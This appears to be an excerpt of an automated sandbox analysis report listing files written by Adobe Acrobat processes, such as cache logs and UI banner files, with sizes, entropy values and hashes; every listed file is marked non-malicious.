SHA-256: | 2BF7E07268E42EAE58FB22F6494D74907096577956A5B5CEF5A4F7DD7D4BD803 |
SHA-512: | 6ECBC8D0AB82EDC901A0857DE134EAF628B8735B07AE01E9529D71C2FB0F017FD23FE0BAC4FC5C0A32E6A6134BC0FD45687FE42F43C196EC9C0CF4AAAA870C50 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.192665092771992 |
Encrypted: | false |
SSDEEP: | 6:iOKRdEADM+q2Pwkn2nKuAl9OmbnIFUtARcAgZmwuR3JNADMVkwOwkn2nKuAl9Omt:7KnEcM+vYfHAahFUtAuJ/ulcMV5JfHAR |
MD5: | B4F8D59A204C4D4DA51C9B3C472893F6 |
SHA1: | 4CF83EB23902C90C31794E1B2C60FD8EB42CBB95 |
SHA-256: | E59FB5CBE462DC0E540751F170BB5678AD87B931B78A384BC101FEC8B0E755CF |
SHA-512: | 4763B86A210C4F56C72D02920D8B54F631D27BF526A9741A045F9C53E165242A38BA62C71FA29D2C9F191AAE69E21A0D0E0677420D45DFF412362819230F7005 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.192665092771992 |
Encrypted: | false |
SSDEEP: | 6:iOKRdEADM+q2Pwkn2nKuAl9OmbnIFUtARcAgZmwuR3JNADMVkwOwkn2nKuAl9Omt:7KnEcM+vYfHAahFUtAuJ/ulcMV5JfHAR |
MD5: | B4F8D59A204C4D4DA51C9B3C472893F6 |
SHA1: | 4CF83EB23902C90C31794E1B2C60FD8EB42CBB95 |
SHA-256: | E59FB5CBE462DC0E540751F170BB5678AD87B931B78A384BC101FEC8B0E755CF |
SHA-512: | 4763B86A210C4F56C72D02920D8B54F631D27BF526A9741A045F9C53E165242A38BA62C71FA29D2C9F191AAE69E21A0D0E0677420D45DFF412362819230F7005 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.181636096640814 |
Encrypted: | false |
SSDEEP: | 6:iOKRfZ9+q2Pwkn2nKuAl9Ombzo2jMGIFUtAR5fR3JZmwuRG9VkwOwkn2nKuAl9OU:7Kd6vYfHAa8uFUtAj7/uS5JfHAa8RJ |
MD5: | 896871EE6D3C8D097E9001211857B2C2 |
SHA1: | 71617611CDE7B02A9CDDF0758E7199947F308C79 |
SHA-256: | EF88AF0C709A838297EF182E50108222CDB7A78F12F135F860D1070D36F10788 |
SHA-512: | EA64239E19ACCDD10E34F40C331E8A591FA1B7A6E107DF9DA59BCC4DBBEEF630226719B5CE6DA8874AB2783B2F3D72844910D0DEC50CFDF1295C3BBECDDF8BF8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.181636096640814 |
Encrypted: | false |
SSDEEP: | 6:iOKRfZ9+q2Pwkn2nKuAl9Ombzo2jMGIFUtAR5fR3JZmwuRG9VkwOwkn2nKuAl9OU:7Kd6vYfHAa8uFUtAj7/uS5JfHAa8RJ |
MD5: | 896871EE6D3C8D097E9001211857B2C2 |
SHA1: | 71617611CDE7B02A9CDDF0758E7199947F308C79 |
SHA-256: | EF88AF0C709A838297EF182E50108222CDB7A78F12F135F860D1070D36F10788 |
SHA-512: | EA64239E19ACCDD10E34F40C331E8A591FA1B7A6E107DF9DA59BCC4DBBEEF630226719B5CE6DA8874AB2783B2F3D72844910D0DEC50CFDF1295C3BBECDDF8BF8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\66c4bdf3-e180-4d13-bd9a-841924fcbc8c.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.949965081254207 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sql6WsBdOg2HDfcaq3QYiubInP7E4T3y:Y2sRdsE6dMH63QYhbG7nby |
MD5: | A381C61CCC8955155351DD0B40F22548 |
SHA1: | 196CF273AB01368E9822364426D097B20312BF08 |
SHA-256: | EE3360835D4F42EC1348579B4D2394F02D82265DD759E9D8B07965C5D7602283 |
SHA-512: | AC91DB0374FFB6136E39ADDB12AB404BE08BC99FEC8C84C4914101B3F6DBFE1D279566568DA6D2ABBE2F7B6DCCCA197FC4CEE9674671A517A226F63A00A0CE36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.949965081254207 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sql6WsBdOg2HDfcaq3QYiubInP7E4T3y:Y2sRdsE6dMH63QYhbG7nby |
MD5: | A381C61CCC8955155351DD0B40F22548 |
SHA1: | 196CF273AB01368E9822364426D097B20312BF08 |
SHA-256: | EE3360835D4F42EC1348579B4D2394F02D82265DD759E9D8B07965C5D7602283 |
SHA-512: | AC91DB0374FFB6136E39ADDB12AB404BE08BC99FEC8C84C4914101B3F6DBFE1D279566568DA6D2ABBE2F7B6DCCCA197FC4CEE9674671A517A226F63A00A0CE36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.258367593344997 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7QX2o:etJCV4FiN/jTN/2r8Mta02fEhgO73goI |
MD5: | 67611E5BDF8FC4C085295C8C2265DBD9 |
SHA1: | 7CFA1C72F10F36DFBB26C50BE5A7F73416F6CA28 |
SHA-256: | 905BEDAB4855D6F637973BA899370CA97EF33080481586B88F12D9715D659D68 |
SHA-512: | 50A143F88C43C8992213EB4C89257B4AE776DD5334BB8D6864ADCB5849BE4A6166D717BDA5A92FA193E683E1692EAC57A72496B7C0E2B2B7653B1530C168182B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.146343510250411 |
Encrypted: | false |
SSDEEP: | 6:iOKa9+q2Pwkn2nKuAl9OmbzNMxIFUtAjZJZmwuM39VkwOwkn2nKuAl9OmbzNMFLJ:7K5vYfHAa8jFUtA3/uI5JfHAa84J |
MD5: | 9EAD503CE5C3E63AC0A0F78810EBC9A7 |
SHA1: | 286DE27A9FAE498ED5B398C10A07B332F39C7817 |
SHA-256: | D2E3243B517CC3C523D980D003A2560F6B3F438B5D5BC5FDC3691049F33FC3D6 |
SHA-512: | 864C51B20880C58A30651229F310950C30E4870B9495D29A95BD7ED021537A1989B8E758617FE6849F6ED26801D6E8AC78F7BE9E9843288EFDD809947082BF72 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.146343510250411 |
Encrypted: | false |
SSDEEP: | 6:iOKa9+q2Pwkn2nKuAl9OmbzNMxIFUtAjZJZmwuM39VkwOwkn2nKuAl9OmbzNMFLJ:7K5vYfHAa8jFUtA3/uI5JfHAa84J |
MD5: | 9EAD503CE5C3E63AC0A0F78810EBC9A7 |
SHA1: | 286DE27A9FAE498ED5B398C10A07B332F39C7817 |
SHA-256: | D2E3243B517CC3C523D980D003A2560F6B3F438B5D5BC5FDC3691049F33FC3D6 |
SHA-512: | 864C51B20880C58A30651229F310950C30E4870B9495D29A95BD7ED021537A1989B8E758617FE6849F6ED26801D6E8AC78F7BE9E9843288EFDD809947082BF72 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.4447731438759215 |
Encrypted: | false |
SSDEEP: | 384:Se9ci5t+iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:BRs3OazzU89UTTgUL |
MD5: | 5B48489B806212372AE1E44FDC6DA593 |
SHA1: | 86CB6F55E059E992FB608C7CAE9213AC8CA3C233 |
SHA-256: | C758B3EA9AED0E6C7A6389DBDABD0E74AFCB8086BD19D5C4FD831FFE089A2E81 |
SHA-512: | 5A65D8A3457772D3C4A50411EE15DD2BF6A20BE2F13174A7470272E602EFA0E772E63C4452AE39E747502A8A706D534014B6E2C651AE035F0E591C31BFCC27FF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.210433123865157 |
Encrypted: | false |
SSDEEP: | 24:7+tFGnuwK6qLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mg:7M4nC6qvmFTIF3XmHjBoGGR+jMz+LhB |
MD5: | 544E26408728536386C36724B306DF99 |
SHA1: | 120FE3ED89F8DEB27658C8392A2918ADA8B96324 |
SHA-256: | 7EB058C64D3CFDCF256D483E20F61A753D28E31DB7F568A4F611CA4BD1A9B674 |
SHA-512: | 39A765432965FFC9F40207401B68C9B7454831345097B41844ECA3E0D0369406787C60A886949BFC883FC994CC63AFF7C639F77451DBE70A78C63CAB54EE5622 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl0UZYGL/tfllXlE/HT8k7zz1NNX8RolJuRdxLlGB9lQRYwpDdt:kKtCYyeT8yzNMa8RdWBwRd |
MD5: | A742A7545431967D686C317726877BD3 |
SHA1: | B8CC03DDDF4206E841A7E7DD393BB0A3961411AE |
SHA-256: | 74CF51BFD7E64AA00AF23A452EC5344E92DB98CFEA8E386A350981B257A6E66F |
SHA-512: | 7A50C8A838A9768CD6C34848C8CD19D57236D938534A1C5BC7E06DACC40CADE99B72332F7385755A003AE0EC47630F69D425AA00C49743E00C9917213EA976A4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.362630712220035 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJM3g98kUwPeUkwRe9:YvXKXQbZc0vIGMbLUkee9 |
MD5: | CDA876BADC8B4D9D44E146658691CD58 |
SHA1: | 468D66B217C34AFC2A949D4905193428D812FDA9 |
SHA-256: | 80D72B28B12924932566F6B1DA657E5F24904DA5DB09F6A2787A9AB4A338F7E4 |
SHA-512: | 6BA1633162B1B0B2617A1E8D0AF258F2F040E61E0DA481F7C2E68EEA2C32F924A35762DEB7A0BD668116E734DD27902D9F7EDF40D53FDBD5E2CB06FC3FCF6F70 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.311308278318672 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfBoTfXpnrPeUkwRe9:YvXKXQbZc0vIGWTfXcUkee9 |
MD5: | B3B88035902594B1C91E85E80501D85D |
SHA1: | C77CCFD7F8A0606568F9CD19A3D7BD69C1938DF5 |
SHA-256: | 5FDECDF4B4E77872C2C6F66A7C92C7F8D18772FED3DF0E741FB35D511B71FF6D |
SHA-512: | C5B530E54790B6CB8EF3F51199C20DBCD608D9E377E50B5957200D562E2BC30A47FB6614941FCDBF9771D65E0563167CFD361DCF535406D3483ECEB936002EA6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.289856594844677 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfBD2G6UpnrPeUkwRe9:YvXKXQbZc0vIGR22cUkee9 |
MD5: | 8B6CAC16E63EACEED18B1A09F349A9E3 |
SHA1: | 1681BD6A802882D347B78C8044778192C09771A5 |
SHA-256: | BC2E105FDC9458F0ACED9E14DCBB2A51816D2B229B65B9DCADE7793D3259C5BF |
SHA-512: | 60AB36F8D8C59E5396E4A0A9D481D463D7A464B5EC4B693EBF11883F6C1DFA7B8563602D1208CCB369997DBEDC4EADE230F10B51F47597AB45C4EE022688CBD4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.349615510552137 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfPmwrPeUkwRe9:YvXKXQbZc0vIGH56Ukee9 |
MD5: | E437FA2E61B2C35B56E0A95A4DEEA913 |
SHA1: | 872D76052EAF4E90F68D8787D6AD2A2B773A23B8 |
SHA-256: | A7AE4431E665E962A7F7977DAB3F2086DB41F5E889876A65919A30252881A525 |
SHA-512: | C28219A58FCA22338255CD14DB1C7B56B09FAB91EFCCE41DB2C556400B12173A92FF8F91F0C04B1EF0FECA8BCB2E673C0626998F767984F0FCC49103FD8EA6C3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688239340481859 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8zvFpLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:Yv7thgy6SAFv5Ah8cv/G |
MD5: | F186BABB5AA05C05AE6F4DFE7312C4E6 |
SHA1: | 00A5F293813E18FE9254D982B6871B71B4F85397 |
SHA-256: | 6C5B80ABADE10B42EA59568604F6ED757BC5B1513A0C6D8A39DC991085380DCD |
SHA-512: | E0704F6644ECB75F9849BA16EC5C38CF85D752E3BB807D0C5FF8FB93CF46A3B6CB189204CB77FB5DFDCE720047CB71EC53BC7AF65B7BA117612AC81746E297F5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.295373381101421 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJf8dPeUkwRe9:YvXKXQbZc0vIGU8Ukee9 |
MD5: | 21D82C546C2964330F54A73451DC12A7 |
SHA1: | 4260E42074BD056AA703B42F19EE3EF33295A015 |
SHA-256: | 4B905E7C7125409BB4F00ED5CD7CB8B4F2A185009ECFB5B01935C1E8E0E513FF |
SHA-512: | 564FA4531A746BF7218E43C776D2AEDB2D147AD1B04D9EF5D5512062A9DA7ABF0A74D2537408B1DEF79ED30B9124DB1159A3D47ACE7E725C899DF385370749D9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.299321550481563 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfQ1rPeUkwRe9:YvXKXQbZc0vIGY16Ukee9 |
MD5: | C9E69CD6BF7903F3DCD635B218A3CDD9 |
SHA1: | 463157871BC2751CA2A8D879A457E42DC6834636 |
SHA-256: | 30C3F5A6CFA202BF7A20F914A9ECFCE59CB54F0C7B821D8F1855041328A47F88 |
SHA-512: | C17881E074B68407B91F5EBCA52D5F47498B0C94F8E98C05C97329A0C9225BA96A7F8DB373134EDECBFD1574568C444C50BA8F46300E58E3AC2FC176519A30C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.304676465158832 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfFldPeUkwRe9:YvXKXQbZc0vIGz8Ukee9 |
MD5: | CE0F86E9A9FD7C504418E311A94F0685 |
SHA1: | FB138292C7B41B86EC13804603436018D8FA3695 |
SHA-256: | 86AED5295A7302375DE45A8B40E67E5B474B7FD406F20F04A3E8A359B3F217BF |
SHA-512: | 0A0D914E1906D953A72E690B516F72C12B3724D69E485195C6A707C9F984E06D88C32C4AB5BCFC5461EB5887A1ED80E74508B63E8B686D9B8FE60D791FF96D19 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3209866236433045 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfzdPeUkwRe9:YvXKXQbZc0vIGb8Ukee9 |
MD5: | 784BF3E0AD57C314BF796C58ECE74117 |
SHA1: | AEFA47E41B706FF7D7047880430A8D44E9929D1E |
SHA-256: | D990D57F4E77B23CD609CA05CA1D37296BD584B2DE70EE6C3B588FC6E9317EAC |
SHA-512: | A0274BBFA3B060B91FD654B0936A83CBFC302893F161602E79EF5D22050CF9F47042578C503ADF900F9FB5B7392163F1C09B3FFAF48C9A023BC1CFAFB1AA30D5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.30166406197529 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfYdPeUkwRe9:YvXKXQbZc0vIGg8Ukee9 |
MD5: | 5EEBCDDDE744813FBBEB59581B70E38F |
SHA1: | 40423BDE7D0DA71C5DAC8617B75986E31541CEBC |
SHA-256: | 90854B97A706DAFAC4248CD14BA19A2FC51E778DD5EEAD2610B203F651D0561B |
SHA-512: | 0233348E5B9823768BA9F11BDCA89CC7768EBE496DF712C4B2DAD5CDA1DF8AE78EF2AF263587E6C668314BA35560BAAC0F72E0580B7DA2426E4DDA2D4B9F3AF7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.288042722591568 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJf+dPeUkwRe9:YvXKXQbZc0vIG28Ukee9 |
MD5: | 8965DA31A72BB535E6511CF79A506735 |
SHA1: | B6EFCDED4BA2C3B954CA6AC97FA397BD168BDD8A |
SHA-256: | F2EF1459E419160B6B43E9F235E578EE4D35A5138307DBA08EFD44316481927F |
SHA-512: | D902A71E34609371409161A616B79727DC48733FF176076704AB85F74EC40C40F4FB9A8F5FD924B5D37696BFD91A4800C5389049DF8C064CA943F1A1C86EAF78 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.28519972279709 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfbPtdPeUkwRe9:YvXKXQbZc0vIGDV8Ukee9 |
MD5: | BDF4404FC475BA2D86ED0D24A5740ABB |
SHA1: | F2EAD55138AF3AC15C1F2618FD2B9A47C76798D3 |
SHA-256: | D7F5E1BB78811D2CAE24CFFEE9544E2202CA62F081C9E1B6EE5BBC87252A6F39 |
SHA-512: | 81B63F8652DA45335F4DBBE4EB6A8AE0B819B452C666E91A441CA97CE596073300FFD93FB1C903CEE3724C6CE3FC5BA0D7071EEC140AAEE7E15EFF2AD39FFD43 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.2898742085360775 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJf21rPeUkwRe9:YvXKXQbZc0vIG+16Ukee9 |
MD5: | 95CEBDF7E673B418AF39522FE916FE03 |
SHA1: | AC3794981DB063606A050C5AE445737FF25949A1 |
SHA-256: | CE5F1B506F832B7B3EB1F8A0E20C009A9135100E180546BE48DDE4D62799612C |
SHA-512: | 6B1AA2E1A436A178F8A8BF09534B27439AAE74260B01A7CEF211131396723849DE85961B6F73DF6D964EA2918E7D67F6A0E4696E268EB6FC37C2328A74AA5EF5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.6664957118638855 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8zvdamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSG:Yv7JBgkDMUJUAh8cvMG |
